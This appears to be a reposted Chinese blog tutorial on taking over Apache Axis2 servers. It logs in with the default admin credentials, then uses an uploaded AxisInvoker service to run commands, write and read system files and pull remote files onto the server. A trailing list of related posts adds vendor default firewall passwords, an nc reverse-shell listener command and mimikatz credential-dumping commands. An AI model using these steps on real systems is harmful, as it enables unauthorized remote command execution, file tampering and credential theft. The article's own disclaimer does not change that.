2. 程式人生 > 實用技巧 >Axis2預設弱口令後臺Getshell+windows反彈webshell+metasploit提權

Axis2預設弱口令後臺Getshell+windows反彈webshell+metasploit提權

阿新 發佈:2020-12-17

上傳aar包獲取webshell

  • 預設弱口令進入axis2控制檯
http://ip:port/axis2/axis2-admin/login
預設口令密碼
admin
axis2


支援的命令?
exec-執行命令,在Linux / Windows上均可使用,不用擔心。

http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=dir%20C:

寫-寫檔案

http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123

info-顯示某些資訊,根據需要進行修改

http://192.168.56.103:8080/axis2/services/AxisInvoker/info

讀取-讀取檔案內容

http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini

下載-下載檔案並將其儲存在某處

http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt

宣告

嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 後果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!

相關推薦

Axis2預設口令後臺Getshell+windows反彈webshell+metasploit

上傳aar包獲取webshell 預設口令進入axis2控制檯 http://ip:port/axis2/axis2-admin/login 預設口令密碼

[漏洞復現] [Vulhub靶機] Tomcat7+ 口令 && 後臺getshell漏洞

免責宣告:本文僅供學習研究,嚴禁從事非法活動,任何後果由使用者本人負責。

各廠家安全裝置口令/預設口令速查表

天融信防火牆 使用者名稱:superman 密碼:talent 天融信防火牆 使用者名稱:superman 密碼:talent!23

Tomcat口令GetShell

口令就好說 0x00 漏洞概述 Tomcat支援後臺部署.war檔案——可直接將WebShell部署到web目錄下。訪問後臺的條件是使用者具有相應許可權。

Dedecms sp2 5.7 後臺getshell審計

前言 最近看了《程式碼審計-企業級Web程式碼安全構架》第一遍,頗有心動,找了個織夢來練練手

〖教程〗NbtScan 139埠口令/Netbios密碼爆破

版本 Ladon >= 7.1 139埠 NetBIOS File and Print Sharing 通過這個埠進入的連線試圖獲得NetBIOS/SMB服務。這個協議被用於Windows"檔案和印表機共享"和SAMBA。

discuz3.4後臺getshell的復現

進入後臺站長-Ucenter設定,設定UC_KEY=隨意(一定要記住,後面要用),來閉合 http://127.0.0.1/discuz34/uc_server\');phpinfo();//

更改創意雲預設資料夾_在Windows 8中更改預設檔案資源管理器啟動資料夾

更改創意雲預設資料夾 The Libraries view is the default view when you open Windows Explorer in Windows 7 or File Explorer in Windows 8. If you want to open a different folder when you o

jenkins未授權訪問/口令漏洞

昨天晚上面試官問到了,還沒來得及看,今天又問到了,猝不及防,藍瘦,香菇、、、

口令掃描.python指令碼

手把手教你打造自己的口令掃描工具(系統口令篇) 前言   在滲透測試過程中,口令檢測是必要的一個環節,選擇一個好用的口令掃描工具,尤為重要。

口令檢測

John the Ripper是一款口令檢測工具,或是口令爆破工具。 口令由r於其簡單性,容易被惡意猜測得到使用者的口令,造成經濟損失。這款工具能幫助我們檢測到口令,提前做好防護措施。

口令

記錄自己學習到的口令的一點知識 第一步:F12檢視原始碼 例子1: <html> <head><meta charset=\"utf-8\"><title>系統登陸</title>

VBSscript實現後臺執行Windows bat指令碼

VBScript 是Visual Basic 語言的輕量級版本,本文介紹使用VBS實現在後臺執行bat指令碼。

windows

schtasks命令使用 schtasks命令比at命令更靈活。而且在Windows Vista、Windows Server 2008及之後版本的作業系統已經棄用at命令。建立一個名稱為\"test\"的計劃任務,啟動許可權為system

[總結]Windows總結

0x01 簡介 可分為縱向與橫向:縱向:低許可權角色獲得高許可權角色的許可權;橫向:獲取同級別角色的許可權。

Kali虛擬機器利用msf17-010執行RCE(針對Windows Server 2008以及2003)

寫在前面: 老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本,否則拿這個去攻擊Windows Server 2

MS16-032 windows本地

試用系統:Tested on x32 Win7,x64 Win8,x64 2k12R2 powershell指令碼: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

Windows Win32k 許可權漏洞

0X01  簡介:   本篇文章將集中介紹兩個利用windows win32k服務的漏洞。

以及反彈shell一些方法

以及反彈shell netcat反彈shell kali中使用nc(netcat)進行監聽 用法 : nv -lvvp 2333(埠號)

windows之mimikatz

mimikatz privilege::debug#命令 sekurlsa::logonPasswords#抓取密碼 winmine::infos#掃雷作弊